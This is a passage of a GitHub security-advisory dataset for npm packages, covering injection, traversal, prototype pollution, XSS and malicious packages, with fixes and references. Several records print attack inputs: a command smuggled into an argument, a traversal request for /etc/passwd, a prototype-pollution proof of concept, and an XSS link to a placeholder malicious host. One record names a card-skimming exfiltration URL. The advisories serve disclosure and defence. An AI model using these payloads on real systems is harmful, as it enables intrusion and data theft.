pid.stat('1 && /usr/local/bin/python');
```
## Recommendation
Update to version 1.1.5 or later.
|
{'CVE-2017-16034'}
|
2021-09-23T21:42:30Z
|
2020-09-01T16:49:19Z
|
CRITICAL
| null |
{'CWE-77'}
|
{'https://www.npmjs.com/advisories/356', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16034'}
| null |
npm
|
GHSA-7j52-6fjp-58gr
|
Inconsistent storage layout for ERC2771ContextUpgradeable
|
### Impact
The storage layout of the ERC2771ContextUpgradeable is not constant between versions.
- versions `4.0.0`, `4.1.0` and `4.2.0`, the contract has a length of 51 slots.
- since `4.3.0`, the contract has a length of 50 slots
- future versions will continue using 50 slots.
This difference in layout could result in breaking upgrades if someone upgrades from an affected version to a non-affected version. It is thus recommended to be extremely careful when upgrading from a contract that uses ERC2771ContextUpgradeable `<4.3.0` to a newer version that uses `>=4.3.0`.
We've assessed the instances of this contract found on chain (with publicly verified source code) and notified the corresponding teams of the risk that an upgrade could cause.
### Workarounds
Potentially breaking upgrades would be caught by the OpenZeppelin Upgrades Plugins for Hardhat and Truffle. It is recommended to use this tooling for all your upgrades.
If you need to upgrade to a newer version of the Upgradeable Contracts library, we recommend copying the previous implementation ERC2771ContextUpgradeable (available in the `release-4.2` branch) and packaging it with your code.
### Reference
https://github.com/OpenZeppelin/openzeppelin-transpiler/pull/86
### For more information
If you have any questions, comments, or need assistance regarding this advisory, email us at [security@openzeppelin.com](mailto:security@openzeppelin.com).
To submit security reports please use [our bug bounty on Immunefi](https://immunefi.com/bounty/openzeppelin/).
| null |
2022-03-14T23:22:27Z
|
2022-03-14T23:22:27Z
|
LOW
| null | null |
{'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable', 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/security/advisories/GHSA-7j52-6fjp-58gr', 'https://github.com/OpenZeppelin/openzeppelin-transpiler/pull/86'}
| null |
npm
|
GHSA-vxwf-pprx-wc25
|
Directory Traversal in citypredict.whauwiller
|
Affected versions of `citypredict.whauwiller` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16104'}
|
2020-08-31T18:20:41Z
|
2018-07-24T00:10:03Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/370', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16104', 'https://github.com/advisories/GHSA-vxwf-pprx-wc25', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/citypredict.whauwiller', 'https://www.npmjs.com/advisories/370'}
| null |
npm
|
GHSA-339j-hqgx-qrrx
|
Prototype Pollution
|
This affects all versions of package nedb. The library could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor.prototype payload.
|
{'CVE-2021-23395'}
|
2021-06-16T20:12:32Z
|
2021-06-21T17:13:06Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-NEDB-1305279', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23395'}
| null |
npm
|
GHSA-7hvm-29rf-2gf2
|
Downloads Resources over HTTP in node-air-sdk
|
Affected versions of `node-air-sdk` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `node-air-sdk`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10647'}
|
2021-01-14T15:57:55Z
|
2020-09-01T16:08:58Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10647', 'https://www.npmjs.com/advisories/250', 'https://nodesecurity.io/advisories/250'}
| null |
npm
|
GHSA-2hqf-qqmq-pgpp
|
Malicious Package in commander-js
|
All versions of `commander-js` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads an arbitrary file and executes its contents as a post-install script.
## Recommendation
This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
| null |
2021-10-01T13:30:38Z
|
2020-09-02T15:48:16Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/763'}
| null |
npm
|
GHSA-cvxm-f295-x957
|
Prototype Pollution in merge-recursive
|
All versions of `merge-recursive` are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via `__proto__` causing the addition or modification of an existing property.
Proof of concept:
```
var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';
var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);
```
## Recommendation
There is currently no fix available.
|
{'CVE-2018-3751'}
|
2021-09-09T20:57:04Z
|
2018-09-18T13:46:06Z
|
CRITICAL
| null |
{'CWE-20'}
|
{'https://www.npmjs.com/advisories/715', 'https://github.com/advisories/GHSA-cvxm-f295-x957', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3751', 'https://hackerone.com/reports/311337'}
| null |
npm
|
GHSA-v5hp-35hw-cw5x
|
XSS in client rendered block templates in rendr
|
Affected versions of `rendr` are vulnerable to cross-site scripting when client side rendering is done inside a `_block`.
Server side rendering is not affected and is properly escaped.
## Recommendation
Update to version 1.1.4 or later.
|
{'CVE-2016-1000230'}
|
2021-09-23T21:32:40Z
|
2020-09-01T15:33:10Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://github.com/rendrjs/rendr/pull/513', 'https://github.com/rendrjs/rendr-handlebars/pull/61', 'https://github.com/rendrjs/rendr-handlebars', 'https://www.npmjs.com/advisories/128', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000230'}
| null |
npm
|
GHSA-6v7p-j23v-4xmw
|
Downloads Resources over HTTP in robot-js
|
Affected versions of `robot-js` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `robot-js`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10608'}
|
2021-01-08T21:06:12Z
|
2019-02-18T23:48:03Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10608', 'https://github.com/advisories/GHSA-6v7p-j23v-4xmw', 'https://www.npmjs.com/advisories/201', 'https://nodesecurity.io/advisories/201'}
| null |
npm
|
GHSA-q5wr-fvpq-p67g
|
Integer Overflow in png-img
|
An integer overflow in the PngImg::InitStorage_() function of png-img before 3.1.0 leads to an under-allocation of heap memory and subsequently an exploitable heap-based buffer overflow when loading a crafted PNG file.
|
{'CVE-2020-28248'}
|
2021-07-26T18:09:11Z
|
2021-12-10T17:23:30Z
|
HIGH
| null |
{'CWE-190', 'CWE-787'}
|
{'https://github.com/gemini-testing/png-img', 'https://securitylab.github.com/advisories/GHSL-2020-142-gemini-png-img', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28248', 'https://github.com/gemini-testing/png-img/commit/14ac462a32ca4b3b78f56502ac976d5b0222ce3d', 'https://github.com/gemini-testing/png-img/compare/v3.0.0...v3.1.0'}
| null |
npm
|
GHSA-vhhw-xjvf-wprr
|
Command Injection in @graphql-tools/git-loader
|
This affects the package @graphql-tools/git-loader before 6.2.6. The use of exec and execSync in packages/loaders/git/src/load-git.ts allows arbitrary command injection.
|
{'CVE-2021-23326'}
|
2021-01-22T18:52:27Z
|
2021-01-29T18:13:14Z
|
MODERATE
| null |
{'CWE-77'}
|
{'https://github.com/ardatan/graphql-tools/commit/6a966beee8ca8b2f4adfe93318b96e4a5c501eac', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23326', 'https://github.com/ardatan/graphql-tools/pull/2470', 'https://advisory.checkmarx.net/advisory/CX-2020-4300', 'https://github.com/ardatan/graphql-tools/releases/tag/%40graphql-tools%2Fgit-loader%406.2.6', 'https://snyk.io/vuln/SNYK-JS-GRAPHQLTOOLSGITLOADER-1062543'}
| null |
npm
|
GHSA-6gp3-h3jj-prx4
|
Prototype pollution in class-transformer
|
class-transformer through 0.2.3 is vulnerable to Prototype Pollution. The 'classToPlainFromExist' function could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.
|
{'CVE-2020-7637'}
|
2022-04-28T17:58:13Z
|
2020-04-07T15:47:40Z
|
MODERATE
| null |
{'CWE-915'}
|
{'https://github.com/typestack/class-transformer/blob/a650d9f490573443f62508bc063b857bcd5e2525/src/ClassTransformer.ts#L29-L31,', 'https://github.com/typestack/class-transformer', 'https://snyk.io/vuln/SNYK-JS-CLASSTRANSFORMER-564431', 'https://github.com/typestack/class-transformer/commit/8f04eb9db02de708f1a20f6f2d2bb309b2fed01e', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7637'}
| null |
npm
|
GHSA-mp55-2274-4pj8
|
Malicious Package in buffer-xgr
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T21:03:38Z
|
2020-09-03T21:54:09Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1244'}
| null |
npm
|
GHSA-7f59-x49p-v8mq
|
Cross-Site Scripting in swagger-ui
|
Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.
Additionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.
## Proof of Concept
```
http://<USER_HOSTNAME>/swagger-ui/index.html?url=http://<MALICIOUS_HOSTNAME>/malicious-swagger-file.json
````
## Recommendation
Update to version 2.2.1 or later.
|
{'CVE-2016-1000226'}
|
2021-09-23T21:29:50Z
|
2020-09-01T15:28:45Z
|
CRITICAL
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/123', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000226', 'https://github.com/swagger-api/swagger-ui/issues/1866', 'https://github.com/swagger-api/swagger-ui', 'https://github.com/swagger-api/swagger-ui/pull/1867'}
| null |
npm
|
GHSA-j5c2-hm46-wp5c
|
Privilege escalation: all users can access Admin-level API keys
|
### Impact
An error in the implementation of the limits service in 4.0.0 allows all authenticated users (including contributors) to view admin-level API keys via the integrations API endpoint, leading to a privilege escalation vulnerability.
Ghost(Pro) has already been patched. Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.9.4. Immediate action should be taken to secure your site - see patches & workarounds below.
It is highly recommended to regenerate all API keys after patching or applying the workaround below.
### Patches
Fixed in 4.10.0, all 4.x sites should upgrade as soon as possible.
### Workarounds
- Disable all non-Administrator accounts to prevent API access.
### For more information
If you have any questions or comments about this advisory:
* email us at security@ghost.org
---
Credits: Aden Yap Chuen Zhen, BAE Systems Applied Intelligence (Malaysia)
|
{'CVE-2021-39192'}
|
2021-09-03T20:23:05Z
|
2021-07-22T19:43:16Z
|
MODERATE
| null |
{'CWE-269', 'CWE-200'}
|
{'https://github.com/TryGhost/Ghost', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39192', 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-j5c2-hm46-wp5c', 'https://github.com/TryGhost/Ghost/releases/tag/v4.10.0'}
| null |
npm
|
GHSA-89q5-mj78-pw5w
|
Cross-site Scripting in pekeupload
|
This affects all versions of package pekeupload. If an attacker induces a user to upload a file whose name contains javascript code, the javascript code will be executed.
|
{'CVE-2021-23673'}
|
2021-11-29T14:53:13Z
|
2021-12-02T17:52:26Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23673', 'https://snyk.io/vuln/SNYK-JS-PEKEUPLOAD-1584360', 'https://github.com/moxiecode/plupload', 'https://github.com/moxiecode/plupload/blob/120cc0b5dd3373d7181fd11b06ac2557c890d3f0/js/jquery.plupload.queue/jquery.plupload.queue.js%23L226'}
| null |
npm
|
GHSA-vg44-fw64-cpjx
|
Incorrect Account Used for Signing
|
### Impact
Anybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index `0`), or with the legacy MEW/MyCrypto HD path, they are not affected.
The vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has already added the account in a previous session (i.e. they added the account, reset the application, then signed something). The serialization/deserialization process does restore a previously added account, but it doesn't restore the index instructing the keyring to use that account for signing. As a result, after serializing then deserializing the keyring state, the account at index `0` is always used for signing even if it isn't the current account.
### Patches
This has been patched ([#14](https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14)) in version >=0.2.1 of [`eth-ledger-bridge-keyring`](https://www.npmjs.com/package/eth-ledger-bridge-keyring), and in version >=0.2.2 of [`@metamask/eth-ledger-bridge-keyring`](https://www.npmjs.com/package/@metamask/eth-ledger-bridge-keyring). Users are encouraged to migrate to the new package name.
### Workarounds
To work around this problem without updating, you should remove then re-add the account before use. As long as the account was added during the lifetime of that process, signing with that account should work correctly.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [MetaMask/eth-ledger-bridge-keyring on GitHub](https://github.com/MetaMask/eth-ledger-bridge-keyring)
* Email the MetaMask team at [hello@metamask.io](mailto:hello@metamask.io)
| null |
2021-08-23T14:40:05Z
|
2020-03-24T15:08:59Z
|
HIGH
| null |
{'CWE-287'}
|
{'https://github.com/MetaMask/eth-ledger-bridge-keyring/commit/f32e529d13a53e55f558d903534d631846dc26ce', 'https://www.npmjs.com/advisories/1498', 'https://github.com/MetaMask/eth-ledger-bridge-keyring/security/advisories/GHSA-vg44-fw64-cpjx', 'https://www.npmjs.com/advisories/1497', 'https://github.com/advisories/GHSA-vg44-fw64-cpjx', 'https://snyk.io/vuln/SNYK-JS-ETHLEDGERBRIDGEKEYRING-561121', 'https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14'}
| null |
npm
|
GHSA-v7cp-5326-54fh
|
Path Traversal in bruteser
|
Versions of `bruteser` prior to 0.1.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
## Recommendation
Upgrade to version 0.1.0 or later.
| null |
2020-08-31T18:43:34Z
|
2020-09-03T16:45:15Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://www.npmjs.com/advisories/999', 'https://hackerone.com/reports/342066'}
| null |
npm
|
GHSA-prfq-f66g-43mp
|
Information disclosure through error object in auth0.js
|
## Overview
Between versions 8.0.0 and 9.13.1(inclusive), in the case of an (authentication) error, the error object returned by the library contains the original request of the user, which may include the plaintext password the user entered.
If the error object is exposed or logged without modification, the application risks password exposure.
## Am I affected?
You are affected by this vulnerability if all of the following conditions apply:
- You are using Auth0.js version between 8.0.0 and 9.13.1(inclusive).
- You store or display error objects without filtering.
## How to fix that?
Developers should upgrade auth0.js to version 9.13.2 or later where user inputted passwords are masked in errors. If upgrading is not possible, a temporary fix may include not storing the error object or displaying it publicly without modification.
## Will this update impact my users?
This fix patches the Auth0.js and may require changes in application code due to password no longer available in error object, but it will not impact your users, their current state, or any existing sessions.
|
{'CVE-2020-5263'}
|
2021-01-08T20:23:16Z
|
2020-04-10T18:19:10Z
|
HIGH
| null |
{'CWE-522'}
|
{'https://github.com/auth0/auth0.js/security/advisories/GHSA-prfq-f66g-43mp', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5263', 'https://github.com/auth0/auth0.js/commit/355ca749b229fb93142f0b3978399b248d710828'}
| null |
npm
|
GHSA-6663-c963-2gqg
|
DoS due to excessively large websocket message in ws
|
Affected versions of `ws` do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
## Recommendation
Update to version 1.1.1 or later.
Alternatively, set the `maxpayload` option for the `ws` server to a value smaller than 256MB.
|
{'CVE-2016-10542'}
|
2020-08-31T18:11:28Z
|
2019-02-18T23:58:35Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://www.npmjs.com/advisories/120', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10542', 'https://github.com/nodejs/node/issues/7388', 'https://github.com/advisories/GHSA-6663-c963-2gqg', 'https://nodesecurity.io/advisories/120'}
| null |
npm
|
GHSA-v756-4whv-48vc
|
Code Injection in cd-messenger
|
cd-messenger through 2.7.26 is vulnerable to Arbitrary Code Execution. User input provided to the `color` argument executed by the `eval` function resulting in code execution.
|
{'CVE-2020-7675'}
|
2021-07-29T18:13:50Z
|
2021-05-17T21:00:24Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7675', 'https://snyk.io/vuln/SNYK-JS-CDMESSENGER-571493'}
| null |
npm
|
GHSA-x4jg-mjrx-434g
|
Improper Verification of Cryptographic Signature in node-forge
|
### Impact
RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.
### Patches
The issue has been addressed in `node-forge` `1.3.0`.
### References
For more information, please see
["Bleichenbacher's RSA signature forgery based on implementation error"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)
by Hal Finney.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [forge](https://github.com/digitalbazaar/forge)
* Email us at [example email address](mailto:security@digitalbazaar.com)
|
{'CVE-2022-24772'}
|
2022-03-30T20:07:56Z
|
2022-03-18T23:10:28Z
|
HIGH
| null |
{'CWE-347'}
|
{'https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24772', 'https://github.com/digitalbazaar/forge', 'https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2', 'https://github.com/digitalbazaar/forge/security/advisories/GHSA-x4jg-mjrx-434g'}
| null |
npm
|
GHSA-rrc9-gqf8-8rwg
|
Prototype Pollution via file load in aws-sdk and @aws-sdk/shared-ini-file-loader
|
This affects the package @aws-sdk/shared-ini-file-loader before 1.0.0-rc.9; the package aws-sdk before 2.814.0. If an attacker submits a malicious INI file to an application that parses it with loadSharedConfigFiles , they will pollute the prototype on the application. This can be exploited further depending on the context.
|
{'CVE-2020-28472'}
|
2021-04-06T20:37:10Z
|
2021-11-16T21:26:43Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://snyk.io/vuln/SNYK-JS-AWSSDKSHAREDINIFILELOADER-1049304', 'https://github.com/aws/aws-sdk-js/pull/3585/commits/7d72aff2a941173733fcb6741b104cd83d3bc611', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28472', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1059426', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059425', 'https://snyk.io/vuln/SNYK-JS-AWSSDK-1059424', 'https://github.com/aws/aws-sdk-js-v3/commit/a209082dff913939672bb069964b33aa4c5409a9'}
| null |
npm
|
GHSA-22j5-38qv-pxx7
|
Hijacked Environment Variables in sqliter
|
The `sqliter` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
## Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should:
1. Delete the package
2. Clear your npm cache
3. Ensure it is not present in any other package.json files on your system
4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
|
{'CVE-2017-16051'}
|
2020-08-31T18:25:08Z
|
2018-07-23T20:50:04Z
|
MODERATE
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/490', 'https://github.com/advisories/GHSA-22j5-38qv-pxx7', 'https://nodesecurity.io/advisories/490', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16051'}
| null |
npm
|
GHSA-884w-698f-927f
|
Arbitrary File Write via Archive Extraction in unzipper
|
Versions of `unzipper` before 0.8.13 are vulnerable to arbitrary file write when used to extract a specifically crafted archive that contains path traversal filenames (`../../file.txt` for example).
## Recommendation
Update to version 0.3.18 or later.
|
{'CVE-2018-1002203'}
|
2020-08-31T18:32:31Z
|
2018-07-27T17:06:50Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://snyk.io/research/zip-slip-vulnerability', 'https://github.com/snyk/zip-slip-vulnerability', 'https://snyk.io/vuln/npm:unzipper:20180415', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1002203', 'https://github.com/ZJONSSON/node-unzipper/commit/2220ddd5b58f6252069a4f99f9475441ad0b50cd', 'https://www.npmjs.com/advisories/680', 'https://hackerone.com/reports/362119', 'https://github.com/ZJONSSON/node-unzipper/pull/59', 'https://github.com/advisories/GHSA-884w-698f-927f'}
| null |
npm
|
GHSA-9cq4-mhmr-84gm
|
Malicious Package in jasmin
|
Version 0.0.3 of `jasmin` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
If version 0.0.3 of this module is found installed you will want to replace it with a version before or after 0.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
| null |
2020-08-31T18:30:30Z
|
2020-09-01T20:26:49Z
|
CRITICAL
| null | null |
{'https://www.npmjs.com/advisories/629'}
| null |
npm
|
GHSA-hgch-jjmr-gp7w
|
Sandbox Breakout / Arbitrary Code Execution in safer-eval
|
Versions of `safer-eval` before 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code.
## Recommendation
Upgrade to version 1.3.2.
|
{'CVE-2019-10760'}
|
2021-07-27T22:20:29Z
|
2019-10-17T18:27:30Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://www.npmjs.com/advisories/787', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10760', 'https://github.com/commenthol/safer-eval/commit/1c29f6a6e304fb650c05056e217e457a0d2cc3c5', 'https://snyk.io/vuln/SNYK-JS-SAFEREVAL-473029'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.